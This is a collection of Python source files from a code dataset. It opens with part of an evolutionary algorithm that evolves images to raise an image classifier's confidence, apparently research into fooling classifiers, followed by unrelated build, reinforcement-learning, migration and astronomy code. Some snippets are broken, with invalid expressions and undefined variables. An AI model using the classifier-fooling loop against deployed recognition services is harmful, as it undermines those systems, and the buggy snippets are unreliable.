Image.new('RGB', (64, 64), color='black')\n draw = ImageDraw.Draw(img)\n background = population[j][\"background\"]\n foreground = population[j][\"foreground\"]\n if(population[j][\"confidence\"] < confidence):\n \n background = (\n background[0] + random.randint(-10, 10) * MUTATION_RATE,\n background[1] + random.randint(-10, 10) * MUTATION_RATE,\n background[2] + random.randint(-10, 10) * MUTATION_RATE)\n foreground = (\n foreground[0] + random.randint(-10, 10) * MUTATION_RATE,\n foreground[1] + random.randint(-10, 10) * MUTATION_RATE,\n foreground[2] + random.randint(-10, 10) * MUTATION_RATE)\n \n draw.rectangle(((0,0),(64,64)), background)\n draw.polygon(shape, foreground)\n \n population.append({\"image\": img, \"confidence\": 0, \"background\": background, \"foreground\": foreground, \"class\": \"\"})\n # delete old\n del population[:population_size]\n\ndef printResults():\n for individual in population:\n print(\"confidence: \", individual[\"confidence\"], \" class: \", individual[\"class\"])\n print(\"..\")\n\ndef getBestResult():\n best = 0\n for individual in population:\n if(individual[\"confidence\"] > best):\n best = individual[\"confidence\"]\n return best\n# get the count of images that match the confidence\ndef getCountThatMatch(confidence):\n count = 0\n for individual in population:\n if(individual[\"confidence\"] >= confidence):\n count += 1\n return count\n\n\n# init parameters\nINITIAL_POPULATION = 10 # EXPERIMENT\nSELECTED_COUNT = 5 # specification\nDESIRED_CONFIDENCE = 0.50 # specification\n\n# run evolutionary algorithm (init -> selection -> loop(crossover-> mutate -> selection) until confidence matches all images)\ndef runEvoAlgorithm():\n initPopulation(INITIAL_POPULATION)\n evalFitness()\n selection(SELECTED_COUNT)\n printResults()\n while getCountThatMatch(DESIRED_CONFIDENCE) < SELECTED_COUNT and stop == False:\n crossover()\n mutate(DESIRED_CONFIDENCE)\n evalFitness()\n selection(SELECTED_COUNT)\n if (stop == False):\n printResults()\n\n# save generated images with desired confidence\ndef saveImages():\n for i in range(len(population)):\n if(population[i][\"confidence\"] > DESIRED_CONFIDENCE):\n image = population[i][\"image\"]\n name = (str(shape) + ';' + str(population[i][\"confidence\"]) + ';' + str(population[i][\"background\"])\n + ';' + str(population[i][\"foreground\"]) + ';' + population[i][\"class\"]).encode('utf-8')\n image.save(name + \".png\")\n webbrowser.open(name + \".png\")\n\n\ndef saveResults():\n df = pd.DataFrame(population, columns=[\"class\", \"confidence\", \"background\", \"foreground\", \"contrast\"])\n print(df)\n df.to_csv(\"results_contrast_color.csv\")\n\nif __name__ == '__main__':\n initConstrastPopulation()\n evalFitness()\n saveResults()\n print(\"api calls: \", api_calls)\n \n","sub_path":"evo_algorithm/ea_contrast/evo_algorithm_contrast.py","file_name":"evo_algorithm_contrast.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"111511355","text":"#!/usr/bin/env python\n\n\n\"\"\"\nA sketchpad to use w/ jupyter\n\"\"\"\n\nimport os, sys, itertools\nimport numpy as np\nimport pandas as pd\nfrom itertools import product\n\n\ndef zipList(a,b, delim='-'):\n \"\"\"function to zip two lists by a delim\"\"\"\n if len(a) == len(b):\n return [delim.join([str(a[i]),str(b[i])]) for i in range(len(a))]\n else:\n sys.exit(\"zipList requires iterators of same length\")\n\n\n\nlPos = [7, 24, 35, 48, 64, 138, 150, 162, 177]\nlID = ['CC', 'GG','CC', 'GG','CC', 'GG','CC', 'GG', 'GG']\nrPos = [16, 66, 86, 87, 103, 136, 150, 167, 207]\nrID = ['CC', 'GG','CC', 'GG','CC', 'GG','CC', 'GG', 'GG']\n\n\nstart, end, oStart, oEnd = 114472, 114559, 114259, 114772\n\ntrueLeft = [l + oStart for l in lPos]\ntrueRight = [r + end for r in rPos]\n\n# left = zipList(trueLeft, lID)\n# right = zipList(trueRight, rID)\nleft = zipList(lPos, lID)\nright = zipList(rPos, rID)\n\n\n## convert to df\ncombinations = pd.DataFrame(list(product(left, right)), columns = ['left','right'])\nleftSide = combinations['left'].str.split('-', expand=True).rename(columns = {0 : 'left', 1 : 'lPAM'})\nrightSide = combinations['right'].str.split('-', expand=True).rename(columns = {0 : 'right', 1 : 'rPAM'})\n\ncombinations = leftSide.join(rightSide, how = 'outer')\ncombinations['left'] = pd.to_numeric(combinations['left'])\ncombinations['right'] = pd.to_numeric(combinations['right'])\n\ncombinations['left'] = np.where(combinations['lID' == 'CC', ])\n\n\n## calculate size of interval\ncombinations['size'] = combinations['right'] - combinations['left']\n## return intervals less than 300\nintervals = combinations.loc[combinations['size'] <= 300].reset_index(drop=True)\n\nleftSide['side'] = 'l'\nrightSide['side'] = 'r'\nl = leftSide.rename(columns = {'left' : 'pos', 'lPAM' : 'PAM'})\nr = rightSide.rename(columns = {'right' : 'pos', 'rPAM' : 'PAM'})\n\nl.append(r)\n","sub_path":"sketchPad.py","file_name":"sketchPad.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582335843","text":"#!/usr/bin/python3\n\nimport argparse\nimport os\nimport sys\nimport subprocess\nimport shutil\nimport time\nimport zipfile\nimport re\n\nprojects = [\n \"download_management\",\n \"proxy_select\",\n \"read_free\",\n \"tabs_overview\",\n \"windows_overview\"\n]\n\nexclusions = [\n \"v8-compile-cache\",\n \"temp\",\n \"out\",\n \"vscode\",\n \".git\",\n \"node_modules\",\n \"/dist\",\n]\n\n\ndef colourprint(string):\n print(\"{0}{2}{1}\".format('\\033[94m', '\\x1b[0m', string))\n\n\ndef timer():\n start = time.time()\n\n def end():\n for _ in range(0, 5):\n print()\n colourprint(f\"RUNTIME: {round(time.time() - start, 2)} SECONDS\")\n return end\n\n\ndef parse():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"select\", type=int, choices=range(-1, len(projects)))\n parser.add_argument(\"-o\", \"--out\", default=\"./out\")\n parser.add_argument(\"-b\", \"--build\", action=\"store_true\")\n parser.add_argument(\"-w\", \"--watch\", action=\"store_true\")\n parser.add_argument(\"-l\", \"--lint\", action=\"store_true\")\n parser.add_argument(\"-z\", \"--zip\", action=\"store_true\")\n parser.add_argument(\"-a\", \"--all\", action=\"store_true\")\n return parser.parse_args()\n\n\ndef zip_dir(base, name, out, exclusions):\n zf = zipfile.ZipFile(f\"{out}/{name}.zip\", \"w\")\n for dirname, subdirs, files in os.walk(base):\n if any([re.compile(exclude).search(dirname) for exclude in exclusions]):\n continue\n zf.write(dirname)\n for filename in files:\n zf.write(os.path.join(dirname, filename))\n zf.close()\n\n\nt = timer()\nargs = parse()\n\n\nif not args.select == -1:\n projects = [projects[args.select]]\n\nif args.all:\n args.build = args.lint = args.zip = True\n\nif not os.path.exists(args.out):\n os.makedirs(args.out)\n\nfor project in projects:\n\n print()\n colourprint(f\"BEGIN -- {project} -- BEGIN\")\n print()\n\n dist = f\"./{project}/dist\"\n if os.path.exists(dist):\n shutil.rmtree(dist)\n os.makedirs(dist)\n\n build = f\"npm run webpack -- --config ./{project}/webpack.config.ts\".split()\n lint = f\"npm run web-ext -- -s ./{project}/dist/ lint\".split()\n package = f\"npm run web-ext -- -o -s {dist} -a {args.out} build\".split()\n watch = f\"{' '.join(build)} --watch\".split()\n pretty = f\"npm run prettier\".split()\n\n if args.build:\n subprocess.call(pretty)\n subprocess.call(build)\n if args.watch:\n subprocess.call(watch)\n if args.lint:\n subprocess.call(lint)\n if args.zip:\n subprocess.call(package)\n zip_dir(\".\", f\"{project}_source\", args.out, exclusions)\n\n print()\n colourprint(f\"END -- {project} -- END\")\n print()\n\nt()\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"496374053","text":"from agent_dir.agent import Agent\n\nfrom collections import deque\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import RMSprop\nfrom keras.layers import Dense, Flatten, Input, Add, RepeatVector, Reshape\nfrom keras.layers.convolutional import Conv2D\nfrom keras import backend as K\nimport os,random,sys\nimport tensorflow as tf\nimport numpy as np\nclass Agent_DQN(Agent):\n def __init__(self, env, args):\n \"\"\"\n Initialize every things you need here.\n For example: building your model\n \"\"\"\n\n super(Agent_DQN,self).__init__(env)\n print(args) \n self.env = env\n self.args = args\n self.state_size = (84, 84, 4)\n self.action_size = env.action_space.n - 1 #ignore nop action\n\n if args.test_dqn:\n #you can load your model here\n print('loading trained model')\n if args.dqn_dueling and os.path.isfile(args.dqn_model):\n print('load duel network model from %s.' % args.dqn_model)\n self.model = self.build_dueling_model()\n self.model.load_weights(args.dqn_model)\n elif os.path.isfile(args.dqn_model):\n print('load model from %s.' % args.dqn_model)\n self.model = self.build_model()\n self.model.load_weights(args.dqn_model)\n\n\n \n\n def init_game_setting(self):\n \"\"\"\n\n Testing function will call this function at the begining of new game\n Put anything you want to initialize if necessary\n\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n pass\n\n\n def train(self):\n \"\"\"\n Implement your training algorithm here\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n args = self.args\n #self.epsilon = 1.\n self.epsilon = args.dqn_epsilon\n self.epsilon_end = args.dqn_epsilon_end\n self.exploration_steps = args.dqn_exploration_steps\n self.epsilon_decay_step = (self.epsilon - self.epsilon_end) \\\n / self.exploration_steps\n # parameters about training\n self.batch_size = args.dqn_batch\n #self.train_start = 50000\n self.train_start = args.dqn_train_start\n #self.train_start = 3000\n self.update_target_rate = args.dqn_update_target \n self.discount_factor = args.dqn_discount_factor\n #self.memory = deque(maxlen=400000)\n self.memory = deque(maxlen=args.dqn_memory)\n self.no_op_steps = args.dqn_no_ops\n # build model\n if args.dqn_dueling:\n self.model = self.build_dueling_model()\n self.model.name = 'dueling_network' \n self.target_model = self.build_dueling_model()\n self.target_model.name = 'dueling_target_network'\n else:\n self.model = self.build_model()\n self.model.name = 'evaluate_network'\n self.target_model = self.build_model()\n self.target_model.name ='target_network'\n self.update_target_model()\n\n\n self.optimizer = self.optimizer()\n self.sess = tf.InteractiveSession()\n K.set_session(self.sess)\n\n self.avg_q_max, self.avg_loss = 0, 0\n\n self.summary_placeholders, self.update_ops, self.summary_op = \\\n self.setup_summary()\n self.summary_writer = tf.summary.FileWriter(\n args.dqn_summary , self.sess.graph)\n self.sess.run(tf.global_variables_initializer())\n \n if self.args.keep_train:\n if args.dqn_dueling: \n if os.path.isfile(args.dqn_model):\n print('load duel network model from %s.' % args.dqn_model)\n self.model.load_weights(args.dqn_model)\n elif os.path.isfile(self.args.dqn_model):\n print('load model from %s.' % args.dqn_model)\n self.model.load_weights(args.dqn_model)\n else:\n print('train a new model.')\n print('Training Mode : double DQN:[%s] duel network:[%s]' % (args.dqn_double_dqn, args.dqn_dueling) )\n \n #training iteration\n scores, episodes, global_step = [], [], 0\n env = self.env\n STATE_WIDTH, STATE_HEIGHT, STATE_LENGTH = (84, 84, 4)\n e = 0\n step, score = 0, 0\n t = 0.\n while e <= args.dqn_max_spisode:\n done = False\n dead = False\n # 1 episode = 5 lives\n observe = env.reset()\n\n # this is one of DeepMind's idea.\n # just do nothing at the start of episode to avoid sub-optimal\n for _ in range(random.randint(1, self.no_op_steps)):\n observe, _, _, _ = env.step(env.get_random_action())\n\n # At start of episode, there is no preceding frame\n # So just copy initial states to make history\n state = np.reshape(observe, (1, STATE_WIDTH, STATE_HEIGHT, STATE_LENGTH))\n history = state\n\n while not dead:\n global_step += 1\n step += 1\n\n # get action for the current history and go one step in environment\n action = self.get_action(history)\n # change action to real_action\n if action == 0:\n real_action = 1\n elif action == 1:\n real_action = 2\n else:\n real_action = 3\n\n observe, reward, dead, info = env.step(real_action)\n # pre-process the observation --> history\n next_state = np.reshape(observe, (1, STATE_WIDTH, STATE_HEIGHT, STATE_LENGTH))\n next_history = next_state \n\n self.avg_q_max += np.amax(\n self.model.predict(np.float32(history))[0])\n\n # if the agent missed ball, agent is dead --> episode is not over\n if info['ale.lives'] == 0:\n done = True\n\n #reward = np.clip(reward, -1., 1.)\n\n # save the sample to the replay memory\n self.replay_memory(history, action, reward, next_history, dead)\n # every some time interval, train model\n self.train_replay()\n # update the target model with model\n if global_step % self.update_target_rate == 0:\n self.update_target_model()\n\n score += reward\n #print('dead done reward score',dead,done,reward,score)\n # if agent is dead, then reset the history\n if not dead:\n history = next_history\n '''\n else:\n print('dead',info['ale.lives'])\n if global_step %100 == 0:\n from time import time\n print('%.1f' % (time()-t))\n t = time()\n '''\n # if done, plot the score over episodes\n if done:\n mode = 'train' if global_step > self.train_start else 'random'\n if global_step > self.train_start:\n stats = [score, self.avg_q_max / float(step), step,\n self.avg_loss / float(step)]\n for i in range(len(stats)):\n self.sess.run(self.update_ops[i], feed_dict={\n self.summary_placeholders[i]: float(stats[i])\n })\n summary_str = self.sess.run(self.summary_op)\n self.summary_writer.add_summary(summary_str, e + 1)\n if e % 10 == 0: \n print(\"episode:\", e, \" score:\", score, \" memory length:\",\n len(self.memory), \" epsilon:\", self.epsilon,\n \" global_step:\", global_step, \" average_q:\",\n self.avg_q_max / float(step), \" average loss:\",\n self.avg_loss / float(step), \" mode:\",mode\n )\n sys.stdout.flush()\n\n self.avg_q_max, self.avg_loss = 0, 0\n if e % args.dqn_save_interval == 0 and e >= args.dqn_save_interval:\n if self.args.dqn_dueling:\n print('save duel network model to %s.' % args.dqn_model)\n self.model.save_weights(args.dqn_model)\n else:\n print('save model to %s with double dqn : %s' % (args.dqn_model, self.args.dqn_double_dqn) )\n self.model.save_weights(args.dqn_model)\n e += 1\n score = 0\n\n\n def make_action(self, observation, test=True):\n \"\"\"\n Return predicted action of your agent\n\n Input:\n observation: np.array\n stack 4 last preprocessed frames, shape: (84, 84, 4)\n\n Return:\n action: int\n the predicted action from trained model\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n state = np.reshape(observation, (1, 84, 84, 4))\n q_value = self.model.predict(state)\n action = np.argmax(q_value[0])\n if action == 0:\n real_action = 1\n elif action == 1:\n real_action = 2\n else:\n real_action = 3\n return real_action\n def optimizer(self):\n a = K.placeholder(shape=(None,), dtype='int32')\n y = K.placeholder(shape=(None,), dtype='float32')\n\n py_x = self.model.output\n\n a_one_hot = K.one_hot(a, self.action_size)\n q_value = K.sum(py_x * a_one_hot, axis=1)\n error = K.square(y - q_value)\n \"\"\"\n error = K.abs(y - q_value)\n quadratic_part = K.clip(error, 0.0, 1.0)\n linear_part = error - quadratic_part\n loss = K.mean(0.5 * K.square(quadratic_part) + linear_part)\n \"\"\"\n error = K.clip(error, 0.0, 3.0)\n loss = K.mean(error)\n optimizer = RMSprop(lr=0.00025, epsilon=0.01)\n updates = optimizer.get_updates(self.model.trainable_weights, [], loss)\n\n train = K.function([self.model.input, a, y], [loss], updates=updates)\n return train \n\n # approximate Q function using Convolution Neural Network\n # state is input and Q Value of each action is output of network\n def build_model(self):\n model = Sequential()\n model.add(Conv2D(32, (8, 8), strides=(4, 4), activation='relu',\n input_shape=self.state_size))\n model.add(Conv2D(64, (4, 4), strides=(2, 2), activation='relu'))\n model.add(Conv2D(64, (3, 3), strides=(1, 1), activation='relu'))\n model.add(Flatten())\n model.add(Dense(512, activation='relu'))\n model.add(Dense(self.action_size))\n #model.summary()\n return model\n def build_dueling_model(self):\n state = Input(shape=(self.state_size))\n\n buf = Conv2D(32, (8, 8), strides=(4, 4), activation='relu')(state)\n buf = Conv2D(64, (4, 4), strides=(2, 2), activation='relu')(buf)\n buf = Conv2D(64, (3, 3), strides=(1, 1), activation='relu')(buf)\n buf = Flatten()(buf)\n #action\n a = Dense(512, activation='relu')(buf)\n a = Dense(self.action_size)(a)\n #value\n v = Dense(512, activation='relu')(buf)\n v = Dense(1)(v)\n v = RepeatVector(self.action_size)(v)\n v = Reshape([self.action_size])(v)\n #sum\n q = Add()([v,a])\n model = Model(inputs=state, outputs=q)\n model.summary()\n return model\n\n # after some time interval update the target model to be same with model\n def update_target_model(self):\n self.target_model.set_weights(self.model.get_weights())\n # get action from model using epsilon-greedy policy\n def get_action(self, history):\n history = np.float32(history)\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.action_size)\n else:\n q_value = self.model.predict(history)\n return np.argmax(q_value[0])\n\n def replay_memory(self, history, action, reward, next_history, dead):\n self.memory.append((history, action, reward, next_history, dead))\n # pick samples randomly from replay memory (with batch_size)\n def train_replay(self):\n if len(self.memory) < self.train_start:\n return\n if self.epsilon > self.epsilon_end:\n self.epsilon -= self.epsilon_decay_step\n\n mini_batch = random.sample(self.memory, self.batch_size)\n\n history = np.zeros((self.batch_size, self.state_size[0],\n self.state_size[1], self.state_size[2]))\n next_history = np.zeros((self.batch_size, self.state_size[0],\n self.state_size[1], self.state_size[2]))\n target = np.zeros((self.batch_size,))\n action, reward, dead = [], [], []\n\n for i in range(self.batch_size):\n history[i] = np.float32(mini_batch[i][0])\n next_history[i] = np.float32(mini_batch[i][3] )\n action.append(mini_batch[i][1])\n reward.append(mini_batch[i][2])\n dead.append(mini_batch[i][4])\n\n target_value = self.target_model.predict(next_history)\n if self.args.dqn_double_dqn:\n eval_act = np.argmax(self.model.predict(next_history), axis = -1)\n #assert eval_act.shape == (self.batch_size,)\n\n # like Q Learning, get maximum Q value at s'\n # But from target model\n for i in range(self.batch_size):\n if dead[i]:\n target[i] = reward[i]\n else:\n if self.args.dqn_double_dqn:\n target[i] = reward[i] + self.discount_factor * \\\n target_value[i,eval_act[i]]\n else:\n target[i] = reward[i] + self.discount_factor * \\\n np.amax(target_value[i])\n loss = self.optimizer([history, action, target])\n self.avg_loss += loss[0]\n\n\n # make summary operators for tensorboard\n def setup_summary(self):\n episode_total_reward = tf.Variable(0.)\n episode_avg_max_q = tf.Variable(0.)\n episode_duration = tf.Variable(0.)\n episode_avg_loss = tf.Variable(0.)\n\n tf.summary.scalar('Total Reward/Episode', episode_total_reward)\n tf.summary.scalar('Average Max Q/Episode', episode_avg_max_q)\n tf.summary.scalar('Duration/Episode', episode_duration)\n tf.summary.scalar('Average Loss/Episode', episode_avg_loss)\n\n summary_vars = [episode_total_reward, episode_avg_max_q,\n episode_duration, episode_avg_loss]\n summary_placeholders = [tf.placeholder(tf.float32) for _ in\n range(len(summary_vars))]\n update_ops = [summary_vars[i].assign(summary_placeholders[i]) for i in\n range(len(summary_vars))]\n summary_op = tf.summary.merge_all()\n return summary_placeholders, update_ops, summary_op\n\n","sub_path":"project/spatial_transformer_networks-master/src/agent_dqn.py","file_name":"agent_dqn.py","file_ext":"py","file_size_in_byte":15317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424319333","text":"def dfs(ar, index=0):\n global s\n for child in ar[index]:\n s = s + child.item\n dfs(ar, child.key - 1)\n\n\nn, c = map(int, input().split())\nadj_list = [[] for _ in range(n)]\ncolors = {}\n_ar = list(map(int, input().split()))\ni = 1\nwhile i < len(_ar):\n if _ar[i - 1] != _ar[i]:\n adj_list[_ar[i] - 1].append(_ar[i])\n i += 1\nprint(adj_list)\n\n\ns = ''\ndfs(adj_list)\n# print(s)\nflag = False\nif str_to_check in s:\n print(\"YES\")\n flag = True\nelif str_to_check in s[::-1]:\n s = s[::-1]\n print(\"YES\")\n flag = True\nelse:\n print(\"NO\")\n\nif flag:\n res = s.index(str_to_check)\n print(res + 1, res + len(str_to_check))\n\n\n\n\n\n\n","sub_path":"Trees/Манкуніанець і квіткове дерево/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"502629585","text":"#!/usr/bin/env python3\nfrom operator import itemgetter\nimport sys\n\nvsPerk= dict()\n\nfor line in sys.stdin:\n\tword, count = line.split('\\t')\n\ttry:\n\t\tcount = int(count)\n\texcept ValueError:\n\t\tcontinue\n\ttry:\n\t\tvsPerk[word].append(count)\n\texcept KeyError:\n\t\tvsPerk[word]=[count]\n\nfor key,items in vsPerk.items():\n\tprint(key,sum(items))\n\nsys.stdout.flush()\n","sub_path":"Task1/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"442808848","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom sqlalchemy import Column, Enum, Index, MetaData, Table, select, not_, and_\nfrom sqlalchemy.engine import reflection\n\n\ndef upgrade(migrate_engine):\n meta = MetaData(bind=migrate_engine)\n\n images = Table('images', meta, autoload=True)\n\n enum = Enum('private', 'public', 'shared', 'community', metadata=meta,\n name='image_visibility')\n enum.create()\n\n images.create_column(Column('visibility', enum, nullable=False,\n server_default='shared'))\n visibility_index = Index('visibility_image_idx', images.c.visibility)\n visibility_index.create(migrate_engine)\n\n images.update(values={'visibility': 'public'}).where(\n images.c.is_public).execute()\n\n image_members = Table('image_members', meta, autoload=True)\n\n # NOTE(dharinic): Mark all the non-public images as 'private' first\n images.update().values(visibility='private').where(\n not_(images.c.is_public)).execute()\n # NOTE(dharinic): Identify 'shared' images from the above\n images.update().values(visibility='shared').where(and_(\n images.c.visibility == 'private', images.c.id.in_(select(\n [image_members.c.image_id]).distinct().where(\n not_(image_members.c.deleted))))).execute()\n\n insp = reflection.Inspector.from_engine(migrate_engine)\n for index in insp.get_indexes('images'):\n if 'ix_images_is_public' == index['name']:\n Index('ix_images_is_public', images.c.is_public).drop()\n break\n\n images.c.is_public.drop()\n","sub_path":"glance/db/sqlalchemy/migrate_repo/versions/045_add_visibility.py","file_name":"045_add_visibility.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"22246145","text":"import os\nimport numpy as np\n\nimport astropy.units as u\n\nfrom . import utils\n\n#import unicorn\n\n__all__ = [\"TemplateError\", \"Template\"]\n\nclass TemplateError():\n \"\"\"\n Make an easy (spline) interpolator for the template error function\n \"\"\"\n def __init__(self, file='templates/TEMPLATE_ERROR.eazy_v1.0', arrays=None, lc=[5500.], scale=1.):\n self.file = file\n if arrays is None:\n self.te_x, self.te_y = np.loadtxt(file, unpack=True)\n else:\n self.te_x, self.te_y = arrays\n \n self.scale = scale\n self.lc = lc\n self._set_limits()\n self._init_spline()\n \n def _set_limits(self):\n \"\"\"\n Limits to control extrapolation\n \"\"\"\n nonzero = self.te_y > 0\n self.min_wavelength = self.te_x[nonzero].min()\n self.max_wavelength = self.te_x[nonzero].max()\n \n def _init_spline(self):\n from scipy import interpolate\n self._spline = interpolate.CubicSpline(self.te_x, self.te_y)\n \n def interpolate(self, filter_wavelength=5500., z=1.):\n \"\"\"\n observed_wavelength is observed wavelength of photometric filters. But \n these sample the *rest* wavelength of the template error function at lam/(1+z)\n \"\"\"\n return self._spline(filter_wavelength/(1+z))*self.scale\n \n def __call__(self, z):\n lcz = np.array(self.lc)/(1+z)\n tef_z = self._spline(self.lc/(1+z))*self.scale \n clip = (lcz < self.min_wavelength) | (lcz > self.max_wavelength)\n tef_z[clip] = 0.\n \n return tef_z\n\nclass Redden():\n \"\"\"\n Wrapper function for `~dust_attenuation` and `~dust_extinction` \n reddening laws\n \"\"\"\n def __init__(self, model=None, Av=0., **kwargs):\n \"\"\"\n model: extinction/attenuation object or str\n \n Allowable string arguments:\n \n 'smc' = `~dust_extinction.averages.G03_SMCBar`\n 'lmc' = `~dust_extinction.averages.G03_LMCAvg`\n 'mw','f99' = `~dust_extinction.parameter_averages.F99`\n 'calzetti00', 'c00' = `~dust_attenuation.averages.C00`\n 'wg00' = '~dust_attenuation.radiative_transfer.WG00`\n \n Av: selective extinction/attenuation\n (passed as tau_V for `WG00`)\n \n \"\"\"\n allowed = ['smc', 'lmc', 'mw', 'f99', 'c00', 'calzetti00', 'wg00',\n 'kc13','reddy15','zafar15']\n \n if isinstance(model, str):\n self.model_name = model\n \n if model in ['smc']:\n from dust_extinction.averages import G03_SMCBar\n self.model = G03_SMCBar()\n elif model in ['lmc']:\n from dust_extinction.averages import G03_LMCAvg\n self.model = G03_LMCAvg()\n elif model in ['mw','f99']:\n from dust_extinction.parameter_averages import F99 \n self.model = F99()\n elif model in ['calzetti00', 'c00']:\n from dust_attenuation.averages import C00\n self.model = C00(Av=Av)\n elif model.lower() in ['kc13']:\n from eazy.sps import KC13\n self.model = KC13(Av=Av, **kwargs)\n elif model.lower() in ['reddy15']:\n from eazy.sps import Reddy15\n self.model = Reddy15(Av=Av, **kwargs)\n elif model.lower() in ['zafar15']:\n from eazy.sps import Zafar15\n self.model = Zafar15(Av=Av)\n elif model in ['wg00']:\n from dust_attenuation.radiative_transfer import WG00\n if 'tau_V' in kwargs:\n self.model = WG00(**kwargs)\n else:\n self.model = WG00(tau_V=Av, **kwargs) \n else:\n msg = \"Requested model ('{model}') not in {allowed}.\" \n raise IOError(msg.format(model=model, allowed=allowed))\n else:\n self.model = model\n self.model_name = 'Unknown'\n \n for k in ['Av', 'tau_V']:\n if hasattr(model, k):\n Av = getattr(model, k)\n break\n \n self.Av = Av\n \n @property \n def ebv(self):\n if hasattr(self.model, 'Rv'):\n return self.Av/self.model.Rv\n else:\n print('Warning: Rv not defined for model: ' + self.__repr__())\n return 0.\n \n def __repr__(self):\n return ''.format(self.model.__repr__(), self.Av)\n \n def __call__(self, wave, left=0, right=1., **kwargs):\n \"\"\"\n Return reddening factor. If input has no units, assume \n `~astropy.units.Angstrom`.\n \"\"\"\n \n if not hasattr(wave, 'unit'):\n xu = wave*u.Angstrom\n else:\n if wave.unit is None:\n xu.unit = u.Angstrom\n else:\n xu = wave\n \n if 'Av' in kwargs:\n self.Av = kwargs['Av']\n \n if 'tau_V' in kwargs:\n self.Av = kwargs['tau_V']\n \n for k in kwargs:\n if hasattr(self.model, k):\n setattr(self.model, k, kwargs[k])\n \n ext = np.atleast_1d(np.ones_like(xu.value))\n \n if hasattr(self.model, 'x_range'):\n if hasattr(self.model, 'extinguish'):\n # dust_extinction has x_range in 1/micron\n xblue = (1./xu.to(u.micron)).value > self.model.x_range[1]\n xred = (1./xu.to(u.micron)).value < self.model.x_range[0]\n else:\n # dust_attenuation has x_range in micron\n xblue = (xu.to(u.micron)).value < self.model.x_range[0]\n xred = (xu.to(u.micron)).value > self.model.x_range[1]\n \n ext[xblue] = left\n ext[xred] = right\n xr = (~xblue) & (~xred)\n else:\n xr = np.isfinite(wave) \n \n if (self.model is None) | (self.Av <= 0):\n # Don't do anything\n pass \n elif hasattr(self.model, 'extinguish'):\n # extinction\n ext[xr] = self.model.extinguish(xu[xr], Av=self.Av)\n elif hasattr(self.model, 'attenuate'):\n # attenuation\n if hasattr(self.model, 'tau_V'):\n # WG00\n self.model.tau_V = self.Av\n else:\n self.model.Av = self.Av\n \n ext[xr] = self.model.attenuate(xu[xr])\n else:\n msg = ('Dust model must have either `attenuate` or `extinguish`'\n ' method.')\n raise IOError(msg)\n \n if hasattr(wave, '__len__'):\n return ext\n elif ext.size == 1:\n return ext[0]\n else:\n return ext\n \nclass Template():\n def __init__(self, sp=None, file=None, name=None, arrays=None, meta={}, to_angstrom=1., velocity_smooth=0, norm_filter=None, resample_wave=None, fits_column='flux', redfunc=Redden(), template_redshifts=[0], verbose=True):\n \"\"\"\n Template object.\n \n Attributes:\n \n wave = wavelength in `~astropy.units.Angstrom`\n flux = flux density, f-lambda\n name = str\n meta = dict\n redfunc = optional `Redden` object\n \n Properties: \n \n flux_fnu = flux density, f-nu\n \n Can optionally specify a 2-dimensional flux array with the first\n dimension indicating the template for the nearest redshift in the \n correspoinding ``template_redshifts`` list. When integrating the \n filter fluxes with ``integrate_filter``, the template index with the \n redshift nearest to the specified redshift will be used.\n \n \"\"\"\n import copy\n from astropy.table import Table\n import astropy.units as u\n \n self.wave = None\n self.flux = None\n \n self.name = 'None'\n self.meta = copy.deepcopy(meta)\n \n self.velocity_smooth = velocity_smooth\n \n if name is None:\n if file is not None:\n self.name = os.path.basename(file)\n else:\n self.name = name\n \n self.orig_table = None\n \n if sp is not None:\n # Prospector \n self.wave = np.cast[np.float](sp.wave)\n self.flux = np.cast[np.float](sp.flux)\n # already fnu\n self.flux *= utils.CLIGHT*1.e10 / self.wave**2\n \n elif file is not None:\n # Read from a file\n if file.split('.')[-1] in ['fits','csv','ecsv']:\n tab = Table.read(file)\n self.wave = tab['wave'].data.astype(np.float)\n self.flux = tab[fits_column].data.astype(np.float)\n self.orig_table = tab\n \n # Transpose because FITS tables stored like NWAVE, NZ\n if self.flux.ndim == 2:\n self.flux = self.flux.T\n \n for k in tab.meta:\n self.meta[k] = tab.meta[k]\n \n else:\n _arr = np.loadtxt(file, unpack=True)\n self.wave, self.flux = _arr[0], _arr[1]\n \n elif arrays is not None:\n self.wave, self.flux = arrays[0]*1., arrays[1]*1.\n #self.set_fnu()\n else:\n raise TypeError('Must specify either `sp`, `file` or `arrays`')\n \n if self.flux.ndim == 1:\n # For redshift dependence\n self.flux = np.atleast_2d(self.flux)\n self.template_redshifts = np.zeros(1)\n self.NZ, self.NWAVE = self.flux.shape\n else:\n self.NZ, self.NWAVE = self.flux.shape\n if 'NZ' in self.meta:\n template_redshifts = [self.meta[f'Z{j}'] \n for j in range(self.meta['NZ'])]\n \n if len(template_redshifts) != self.NZ:\n msg = (f'template_redshifts ({len(template_redshifts)})'\n f' doesn\\'t match flux dimension ({self.NZ})!')\n raise ValueError(msg)\n \n self.template_redshifts = 